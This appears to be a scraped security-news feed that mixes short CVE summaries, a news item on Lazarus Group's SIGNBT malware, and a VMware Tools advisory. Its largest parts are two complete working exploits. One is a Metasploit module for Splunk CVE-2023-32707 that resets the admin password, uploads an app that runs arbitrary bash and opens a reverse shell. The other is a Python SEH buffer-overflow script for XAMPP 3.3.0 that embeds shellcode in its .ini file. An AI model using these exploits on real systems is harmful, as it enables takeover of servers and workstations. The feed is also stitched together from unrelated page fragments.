HashiCorp Vagrant's Windows installer targeted a custom location with a non-protected path that could be junctioned, introducing potential for unauthorized file system writes. Fixed in Vagrant 2.4.0.

**HashiCorp Vagrant Insecure Operation on Windows Junction / Mount Point vulnerability**

Low severity GitHub Reviewed Published Oct 28, 2023 to the GitHub Advisory Database • Updated Oct 31, 2023

GHSA-47xw-vw6m-w9fq: HashiCorp Vagrant Insecure Operation on Windows Junction / Mount Point vulnerability

CVE-2023-5834: HCSEC-2023-31 - Vagrant’s Windows Installer Allowed Directory Junction Write

An issue was discovered in VERMEG AgileReporter 21.3. XXE can occur via an XML document to the Analysis component.

CVE-2022-34832: XXE in AgileReporter 21.3 by VERMEG


Due to inadequate code logic, a previously unauthenticated threat actor could potentially obtain a local Windows OS user token through the FactoryTalk® Services Platform web service and then use the token to log in into FactoryTalk® Services Platform . This vulnerability can only be exploited if the authorized user did not previously log in into the FactoryTalk® Services Platform web service.



**JavaScript required**

JavaScript is required. This web browser does not support JavaScript or JavaScript in this web browser is not enabled.

To find out if your web browser supports JavaScript or to enable JavaScript, see web browser help.

CVE-2023-46290: Sign In

The North Korea-aligned Lazarus Group has been attributed as behind a new campaign in which an unnamed software vendor was compromised through the exploitation of known security flaws in another high-profile software.
The attack sequences, according to Kaspersky, culminated in the deployment of malware families such as SIGNBT and LPEClient, a known hacking tool used by the threat actor for

The North Korea-aligned **Lazarus Group** has been attributed as behind a new campaign in which an unnamed software vendor was compromised through the exploitation of known security flaws in another high-profile software.

The attack sequences, according to Kaspersky, culminated in the deployment of malware families such as SIGNBT and LPEClient, a known hacking tool used by the threat actor for victim profiling and payload delivery.

"The adversary demonstrated a high level of sophistication, employing advanced evasion techniques and introducing SIGNBT malware for victim control," security researcher Seongsu Park said. "The SIGNBT malware used in this attack employed a diverse infection chain and sophisticated techniques."

The Russian cybersecurity vendor said the company that developed the exploited software had been a victim of a Lazarus attack several times, indicating an attempt to steal source code or poison the software supply chain, as in the case of the 3CX supply chain attack.

The Lazarus Group "continued to exploit vulnerabilities in the company's software while targeting other software makers," Park added. As part of the latest activity, a number of victims are said to have been singled out as of mid-July 2023.

The victims, per the company, were targeted through a legitimate security software designed to encrypt web communications using digital certificates. The name of the software was not disclosed and the exact mechanism by which the software was weaponized to distribute SIGNBT remains unknown.

Besides relying on various tactics to establish and maintain persistence on compromised systems, the attack chains employ an in-memory loader that acts as a conduit to launch the SIGNBT malware.

The main function of SIGNBT is to establish contact with a remote server and retrieve further commands for execution on the infected host. The malware is so named for its use of distinctive strings that are prefixed with "SIGNBT" in its HTTP-based command-and-control (C2) communications -

*   SIGNBTLG, for initial connection
*   SIGNBTKE, for gathering system metadata upon receiving a SUCCESS message from the C2 server
*   SIGNBTGC, for fetching commands
*   SIGNBTFI, for communication failure
*   SIGNBTSR, for a successful communication

The Windows backdoor, for its part, is armed with a wide range of capabilities to exert control over the victim's system. This includes process enumeration, file and directory operations, and the deployment of payloads such as LPEClient and other credential-dumping utilities.

Kaspersky said it identified at least three disparate Lazarus campaigns in 2023 using varied intrusion vectors and infection procedures, but consistently relied on LPEClient malware to deliver the final-stage malware.

One such campaign paved the way for an implant codenamed Gopuram, which was used in cyber assaults targeting cryptocurrency companies by leveraging a trojanized version of the 3CX voice and video conferencing software.

The latest findings are just the latest example of North Korean-linked cyber operations, in addition to being a testament to the Lazarus Group's ever-evolving and ever-expanding arsenal of tools, tactics, and techniques.

"The Lazarus Group remains a highly active and versatile threat actor in today's cybersecurity landscape," Park said.

"The threat actor has demonstrated a profound understanding of IT environments, refining their tactics to include exploiting vulnerabilities in high-profile software. This approach allows them to efficiently spread their malware once initial infections are achieved."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

N. Korean Lazarus Group Targets Software Vendor Using Known Flaws

Splunk suffers from an issue where a low-privileged user who holds a role that has the edit_user capability assigned to it can escalate their privileges to that of the admin user by providing a specially crafted web request. This is because the edit_user capability does not honor the grantableRoles setting in the authorize.conf configuration file, which prevents this scenario from happening. This exploit abuses this vulnerability to change the admin password and login with it to upload a malicious app achieving remote code execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  attr_accessor :cookie  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Splunk "edit_user" Capability Privilege Escalation',        'Description' => %q{          A low-privileged user who holds a role that has the "edit_user" capability assigned to it          can escalate their privileges to that of the admin user by providing a specially crafted web request.          This is because the "edit_user" capability does not honor the "grantableRoles" setting in the authorize.conf          configuration file, which prevents this scenario from happening.          This exploit abuses this vulnerability to change the admin password and login with it to upload a malicious app achieving RCE.        },        'Author' => [          'Mr Hack (try_to_hack) Santiago Lopez', # discovery          'Heyder Andrade', # metasploit module          'Redway Security <redwaysecurity.com>' # Writeup and PoC        ],        'License' => MSF_LICENSE,        'References' => [          [ 'CVE', '2023-32707' ],          [ 'URL', 'https://advisory.splunk.com/advisories/SVD-2023-0602' ], # Vendor Advisory          [ 'URL', 'https://blog.redwaysecurity.com/2023/09/exploit-cve-2023-32707.html' ], # Writeup          [ 'URL', 'https://github.com/redwaysecurity/CVEs/tree/main/CVE-2023-32707' ] # PoC        ],        'Payload' => {          'Space' => 1024,          'DisableNops' => true        },        'Platform' => %w[linux unix win osx],        'Targets' => [          [            'Splunk < 9.0.5, 8.2.11, and 8.1.14 / Linux',            {              'Arch' => ARCH_CMD,              'Platform' => %w[linux unix],              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_python',                # just to avoid the error because of the clean up: 'error retrieving current directory: getcwd: cannot access parent directories:'                'AutoRunScript' => 'post/multi/general/execute COMMAND=cd $SPLUNK_HOME'              }            }          ],          [            'Splunk < 9.0.5, 8.2.11, and 8.1.14 / Windows',            {              'Arch' => ARCH_CMD,              'Platform' => 'win',              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/adduser' }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8000,          'SSL' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            IOC_IN_LOGS, # requests are logged in the _audit index            # ARTIFACTS_ON_DISK # app is removed in the cleanup method          ]        },        'DisclosureDate' => '2023-06-01'      )    )    register_options(      [        OptString.new('USERNAME', [true, 'The username with "edit_user" role to authenticate as']),        OptString.new('PASSWORD', [true, 'The password for the specified username']),        OptString.new('TARGET_USER', [true, 'The username to change the password for (default: admin)', 'admin']),        OptString.new('TARGET_PASSWORD', [false, 'The new password to set for the admin user (default: random)', Rex::Text.rand_text_alpha(rand(8..12))]),        OptString.new('APP_NAME', [false, 'The name of the app to upload (default: random)', Faker::App.name.downcase.gsub(/(\s|-|_){1,}/, '')])      ]    )    # That depends on finding a strategy to distinguish commands that return output and commands that don't    # register_advanced_options(    #   [    #     OptBool.new('ReturnOutput', [ true, 'Display command output', false ])    #   ]    # )  end  def check    splunk_login(datastore['USERNAME'], datastore['PASSWORD'])    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/en-US/splunkd/__raw/services/authentication/users/', datastore['USERNAME']),      'method' => 'GET',      'cookie' => cookie,      'vars_get' => {        'output_mode' => 'json'      }    })    return CheckCode::Unknown('Could not detect the version.') unless res&.code == 200    body = res.get_json_document    version = Rex::Version.new(body['generator']['version'])    return CheckCode::Safe("Detected Splunk version #{version} which is not vulnerable") unless (      (Rex::Version.new('9.0.0') <= version && version < Rex::Version.new('9.0.5')) ||      (Rex::Version.new('8.2.0') <= version && version < Rex::Version.new('8.2.11')) ||      (Rex::Version.new('8.1.0') <= version && version < Rex::Version.new('8.1.14'))    )    print_status("Detected Splunk version #{version} which is vulnerable")    capabilities = body['entry'].first['content']['capabilities']    return CheckCode::Safe("User '#{datastore['USERNAME']}' does not have 'edit_user' capability") unless capabilities.include? 'edit_user'    report_vuln(      host: rhost,      name: name,      refs: references,      info: [version]    )    CheckCode::Vulnerable("User '#{datastore['USERNAME']}' has 'edit_user' capability")  end  def app_name    datastore['APP_NAME']  end  # The cleanup method is removing the app before the session is closed and it is broking the session.  #  def cleanup    return unless session_created?    super    # Destroy job    vprint_status("Cleaning up: destroying job #{@job_id}")    send_request_cgi({      'uri' => normalize_uri('/en-US/splunkd/__raw/services/search/jobs/', job_id),      'method' => 'DELETE',      'cookie' => cookie    })    # Remove app    vprint_status("Cleaning up: removing app #{app_name}")    execute_command("bash -c 'rm -rf $SPLUNK_HOME/etc/apps/#{app_name}'")    send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/en-US/debug/refresh'),      'method' => 'POST',      'cookie' => cookie,      'vars_post' => {        'splunk_form_key' => cookies_hash['splunkweb_csrf_token_8000']      }    })  end  def exploit    splunk_change_password(datastore['TARGET_USER'], datastore['TARGET_PASSWORD'])    splunk_login(datastore['TARGET_USER'], datastore['TARGET_PASSWORD'])    splunk_upload_app(app_name, datastore['SPLUNK_APP_FILE'])    @job_id = execute_command(payload.encoded, { app_name: app_name })    # TODO: distinguish commands that return output and commands that don't    # fail_with(Failure::ConfigError, 'The payload returns output. Consider to set ReturnOutput to true') if payload.encoded.include? 'return output' && !datastore['ReturnOutput']    # if datastore['ReturnOutput']    #   print_status('Waiting for command output')    #   print_line(splunk_fetch_job_output)    # end  end  def execute_command(cmd, opts = {})    res = send_request_cgi({      'uri' => '/en-US/api/search/jobs',      'method' => 'POST',      'cookie' => cookie,      'headers' =>        {          'X-Requested-With' => 'XMLHttpRequest',          'X-Splunk-Form-Key' => cookies_hash['splunkweb_csrf_token_8000']        },      'vars_post' =>        {          'auto_cancel' => '62',          'status_buckets' => '300',          'output_mode' => 'json',          'search' => "|  #{app_name} #{Rex::Text.encode_base64(cmd)}",          'earliest_time' => '-1@h',          'latest_time' => 'now',          'ui_dispatch_app' => (opts[:app_name]).to_s        }    })    fail_with(Failure::UnexpectedReply, "Unable to execute command. Unexpected reply (HTTP #{res.code})") unless res&.code == 200    body = res.get_json_document    fail_with(Failure::UnexpectedReply, 'Unable to get JOB ID of the command') unless body['data']    body['data']  end  def splunk_helper_extract_token(uri)    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, uri),      'method' => 'GET',      'keep_cookies' => true    })    fail_with(Failure::Unreachable, 'Unable to get token') unless res&.code == 200    "session_id_8000=#{rand_text_numeric(40)}; " << res.get_cookies  end  def splunk_login(username, password)    # gets cval and splunkweb_uid cookies    self.cookie = splunk_helper_extract_token('/en-US/account/login')    # login post, should get back the splunkd_8000 and splunkweb_csrf_token_8000 cookies    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/en-US/account/login'),      'method' => 'POST',      'cookie' => cookie,      'vars_post' =>        {          'username' => username,          'password' => password,          'cval' => cookies_hash['cval']        }    })    fail_with(Failure::UnexpectedReply, 'Unable to login') unless res&.code == 200    cookie << " #{res.get_cookies}"  end  def splunk_change_password(username, password)    # due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set    do_login(username, password) unless cookie    print_status("Changing '#{username}' password to #{password}")    res = send_request_cgi({      'uri' => normalize_uri('/en-US/splunkd/__raw/services/authentication/users/', username),      'method' => 'POST',      'headers' => {        'X-Splunk-Form-Key' => cookies_hash['splunkweb_csrf_token_8000'],        'X-Requested-With' => 'XMLHttpRequest'      },      'cookie' => cookie,      'vars_post' => {        'output_mode' => 'json',        'password' => password,        'force-change-pass' => 0,        'locked-out' => 0      }    })    fail_with(Failure::UnexpectedReply, "Unable to change #{username}'s password.") unless res&.code == 200    print_good("Password of the user '#{username}' has been changed to #{password}")    body = res.get_json_document    capabilities = body['entry'].first['content']['capabilities']    fail_with(Failure::BadConfig, "The user '#{username}' does not have 'install_app' capability. You may consider to target other user") unless capabilities.include? 'install_apps'  end  def splunk_upload_app(app_name, _file_name)    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/en-US/manager/appinstall/_upload'),      'method' => 'GET',      'cookie' => cookie    })    fail_with(Failure::UnexpectedReply, 'Unable to get form state') unless res&.code == 200    html = res.get_html_document    print_status("Uploading file #{app_name}")    data = Rex::MIME::Message.new    # fill the hidden fields from the form: state and splunk_form_key    html.at('[id="installform"]').elements.each do |form|      next unless form.attributes['value']      data.add_part(form.attributes['value'].to_s, nil, nil, "form-data; name=\"#{form.attributes['name']}\"")    end    data.add_part('1', nil, nil, 'form-data; name="force"')    data.add_part(splunk_app, 'application/gzip', 'binary', "form-data; name=\"appfile\"; filename=\"#{app_name}.tar.gz\"")    post_data = data.to_s    res = send_request_cgi({      'uri' => '/en-US/manager/appinstall/_upload',      'method' => 'POST',      'cookie' => cookie,      'ctype' => "multipart/form-data; boundary=#{data.bound}",      'data' => post_data    })    fail_with(Failure::Unknown, 'Error uploading App') unless (res&.code == 303 || (res.code == 200 && res.body !~ /There was an error processing the upload/))    print_good("#{app_name} successfully uploaded")  end  # def splunk_fetch_job_output  #   res = send_request_cgi({  #     'uri' => normalize_uri(target_uri.path, "/en-US/splunkd/__raw/servicesNS/#{datastore['TARGET_USER']}/#{app_name}/search/jobs/#{@job_id}/results"),  #     'method' => 'GET',  #     'keep_cookies' => true,  #     'cookie' => cookie,  #     'vars_get' => {  #       'output_mode' => 'json'  #     }  #   })  #   fail_with(Failure::UnexpectedReply, "Unable to get JOB results. Unexpected reply (HTTP #{res.code})") unless res&.code == 200  #   body = res.get_json_document  #   fail_with(Failure::UnexpectedReply, "Splunk reply: #{body['messages'].collect { |h| h['text'] if h['type'] == 'ERROR' }.join('\n')}") if body['results'].empty?  #   Rex::Text.decode_base64(body['results'].first['result'])  # end  def splunk_app    # metadata folder    metadata = <<~EOF      [commands]      export = system    EOF    # default folder    commands_conf = <<~EOF      [#{app_name}]      type = python      filename = #{app_name}.py      local = false      enableheader = false      streaming = false      perf_warn_limit = 0    EOF    app_conf = <<~EOF      [launcher]      author=#{Faker::Name.name}      description=#{Faker::Lorem.sentence}      version=#{Faker::App.version}      [ui]      is_visible = false    EOF    # bin folder    msf_exec_py = <<~EOF      import sys, base64, subprocess      import splunk.Intersplunk      header = ['result']      results = []      try:        proc = subprocess.Popen(['/bin/bash', '-c', base64.b64decode(sys.argv[1]).decode()], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)        output = proc.stdout.read().decode('utf-8')        results.append({'result': base64.b64encode(output.encode('utf-8')).decode('utf-8')})      except Exception as e:        error_msg = f'Error : {str(e)} '        results = splunk.Intersplunk.generateErrorResults(error_msg)      splunk.Intersplunk.outputResults(results, fields=header)    EOF    tarfile = StringIO.new    Rex::Tar::Writer.new tarfile do |tar|      tar.add_file("#{app_name}/metadata/default.meta", 0o644) do |io|        io.write metadata      end      tar.add_file("#{app_name}/default/commands.conf", 0o644) do |io|        io.write commands_conf      end      tar.add_file("#{app_name}/default/app.conf", 0o644) do |io|        io.write app_conf      end      tar.add_file("#{app_name}/bin/#{app_name}.py", 0o644) do |io|        io.write msf_exec_py      end    end    tarfile.rewind    tarfile.close    Rex::Text.gzip(tarfile.string)  end  def cookies_hash    cookie.split(';').each_with_object({}) { |name, h| h[name.split('=').first.strip] = name.split('=').last.strip }  endend

Splunk edit_user Capability Privilege Escalation

XAMPP version 3.3.0 .ini unicode + SEH buffer overflow exploit.

# Exploit Title: XAMPP v3.3.0 — '.ini' Buffer Overflow (Unicode + SEH)  
# Date: 2023-10-26  
# Author: Talson (@Ripp3rdoc)  
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.0.28/xampp-windows-x64-8.0.28-0-VS16-installer.exe  
# Version: 3.3.0  
# Tested on: Windows 11  
# CVE-2023-46517

##########################################################  
# _________ _______  _        _______  _______  _        #  
# \__   __/(  ___  )( \      (  ____ $  ___  )( (    /| #  
#    ) (   | (   ) || (      | (    \/| (   ) ||  \  ( | #  
#    | |   | (___) || |      | (_____ | |   | ||   \ | | #  
#    | |   |  ___  || |      (_____  )| |   | || (\ $ | #  
#    | |   | (   ) || |            ) || |   | || | \   | #  
#    | |   | )   ( || (____/\/\____) || (___) || )  \  | #  
#    )_(   |/     \|(_______/\_______)(_______)|/    )_) #  
#                                                        #  
##########################################################

# Proof of Concept:

# 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini"  
# 2.- Open the application (xampp-control.exe)  
# 3.- Click on the "admin" button in front of Apache service.  
# 4.- Profit

# Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/

# Greetingz to EMU TEAM (¬‿¬)⩙

from pwn import *  
import shutil  
import os.path

buffer      =   "\x41" * 268        # 268 bytes to fill the buffer  
nseh        =   "\x59\x71"          # next SEH address  — 0x00590071 (a harmless padding)  
seh         =   "\x15\x43"          # SEH handler       — 0x00430015: pop ecx ; pop ebp ; ret ;  
padd        =   "\x71" * 0x55       # padding

eax_align =     "\x47"         # venetian pad/align  
eax_align +=    "\x51"          # push ecx  
eax_align +=    "\x71"         # venetian pad/align  
eax_align +=    "\x58"        # pop eax               -> eax = 0019e1a0  
eax_align +=    "\x71"         # venetian pad/align   
eax_align +=    "\x05\x24\x11"  # add eax,0x11002300  
eax_align +=    "\x71"         # venetian pad/align  
eax_align +=    "\x2d\x11\x11"  # sub eax,0x11001100    -> eax = 0019F3DC  
eax_align +=    "\x71"         # venetian pad/align  
eax_align +=    "\x50"         # push eax   
eax_align +=    "\x71"        # pad to align the following ret  
eax_align +=    "\xc3";        # ret into eax?

# msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin  
# Payload size: 512 bytes  
shellcode = (  
    "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1"  
    "AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx"  
    "Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk"  
    "myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML"  
    "JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57"  
    "KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA"  
    )

shellcode = buffer + nseh + seh +  eax_align + padd + shellcode

check_file = os.path.isfile("c:\\xampp\\xampp-control.ini")

if check_file:

        print("[!] Backup file found. Generating the POC file...")  
    pass  
else:    
    # create backup  
    try:  
        shutil.copyfile("c:\\xampp\\xampp-control.ini", "c:\\xampp\\xampp-control.ini.bak")  
        print("[+] Creating backup for xampp-control.ini...")  
        print("[+] Backup file created!")  
    except Exception as e:  
        print("[!] Failed creating a backup for xampp-control.ini: ", e)

try:

        # Create the new file  
    with open("c:\\xampp\\xampp-control.ini", "w", encoding='utf-8') as file:  
        file.write(f"""[Common]  
    Edition=  
    Editor=  
    Browser={shellcode}

    Debug=0  
    Debuglevel=0  
    Language=en  
    TomcatVisible=1  
    Minimized=0

    [LogSettings]  
    Font=Arial  
    FontSize=10

    [WindowSettings]  
    Left=-1  
    Top=-1  
    Width=682  
    Height=441

    [Autostart]  
    Apache=0  
    MySQL=0  
    FileZilla=0  
    Mercury=0  
    Tomcat=0

    [Checks]  
    CheckRuntimes=1  
    CheckDefaultPorts=1

    [ModuleNames]  
    Apache=Apache  
    MySQL=MySQL  
    Mercury=Mercury  
    Tomcat=Tomcat

    [EnableModules]  
    Apache=1  
    MySQL=1  
    FileZilla=1  
    Mercury=1  
    Tomcat=1

    [EnableServices]  
    Apache=1  
    MySQL=1  
    FileZilla=1  
    Tomcat=1

    [BinaryNames]  
    Apache=httpd.exe  
    MySQL=mysqld.exe  
    FileZilla=filezillaserver.exe  
    FileZillaAdmin=filezilla server interface.exe  
    Mercury=mercury.exe  
    Tomcat=tomcat8.exe

    [ServiceNames]  
    Apache=Apache2.4  
    MySQL=mysql  
    FileZilla=FileZillaServer  
    Tomcat=Tomcat  
    [ServicePorts]  
    Apache=80  
    ApacheSSL=443  
    MySQL=3306  
    FileZilla=21  
    FileZill=14147  
    Mercury1=25  
    Mercury2=79  
    Mercury3=105  
    Mercury4=106  
    Mercury5=110  
    Mercury6=143  
    Mercury7=2224  
    TomcatHTTP=8080  
    TomcatAJP=8009  
    Tomcat=8005  
    [UserConfigs]  
    Apache=   
    MySQL=  
    FileZilla=  
    Mercury=  
    Tomcat=

    [UserLogs]  
    Apache=  
    MySQL=  
    FileZilla=  
    Mercury=  
    Tomcat=  
    """)  
    print("[+] Created the POC!")

except Exception as e:  
    print("[!] Failed creating the POC xampp-control.ini: ", e)

XAMPP 3.3.0 Buffer Overflow

SonicWall NetExtender Windows (32-bit and 64-bit) client 10.2.336 and earlier versions have a DLL Search Order Hijacking vulnerability in the start-up DLL component. Successful exploitation via a local attacker could result in command execution in the target system.

CVE-2023-44220

A local privilege escalation vulnerability in SonicWall Directory Services Connector Windows MSI client 4.1.21 and earlier versions allows a local low-privileged user to gain system privileges through running the recovery feature.

CVE-2023-44219

open-vm-tools contains a file descriptor hijack vulnerability in the vmware-user-suid-wrapper. A malicious actor with non-root privileges may be able to hijack the 
/dev/uinput file descriptor allowing them to simulate user inputs.

Advisory ID: VMSA-2023-0024

CVSSv3 Range: 7.5 - 7.8

Issue Date: 2023-10-26

Updated On: 2023-10-26 (Initial Advisory)

CVE(s): CVE-2023-34057, CVE-2023-34058

Synopsis: VMware Tools updates address Local Privilege Escalation and SAML Token Signature Bypass vulnerabilities (CVE-2023-34057, CVE-2023-34058)

****1\. Impacted Products****

*   VMware Tools

****2\. Introduction****

Multiple vulnerabilities in VMware Tools were responsibly reported to VMware. Updates are available to remediate these vulnerabilities in affected VMware products.

****3a. Local privilege escalation vulnerability in VMware Tools (macOS) (CVE-2023-34057)****

VMware Tools contains a local privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8.

A malicious actor with local user access to a guest virtual machine may elevate privileges within the virtual machine.

To remediate CVE-2023-34057 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.

VMware would like to thank Dan Revah of Google for reporting this issue to us.

****3b. SAML Token Signature Bypass vulnerability in VMware Tools (CVE-2023-34058)****

VMware Tools contains a SAML token signature bypass vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.5.

A malicious actor that has been granted Guest Operation Privileges in a target virtual machine may be able to elevate their privileges if that target virtual machine has been assigned a more privileged Guest Alias.

To remediate CVE-2023-34058 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.

*   While the description and known attack vectors are very similar to CVE-2023-20900, CVE-2023-34058 has a different root cause that has now been addressed.
*   CVE-2023-34058 also impacts open-vm-tools. Fixes have been provided to the Linux community for distribution.

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

VMware Tools

12.x.x, 11.x.x, 10.3.x

macOS

CVE-2023-34057

7.8

important

12.1.1

None

None

VMware Tools

12.x.x, 11.x.x, 10.3.x

Windows

CVE-2023-34057

N/A

N/A

Unaffected

N/A

N/A

VMware Tools

12.x.x, 11.x.x, 10.3.x

macOS

CVE-2023-34058

N/A

N/A

Unaffected

N/A

N/A

VMware Tools

12.x.x, 11.x.x, 10.3.x

Windows

CVE-2023-34058

7.5

important

12.3.5

None

None

****4\. References****

****5\. Change Log****

**2023-10-26 VMSA-2023-0024  
**Initial security advisory.

****6\. Contact****

Tag

#windows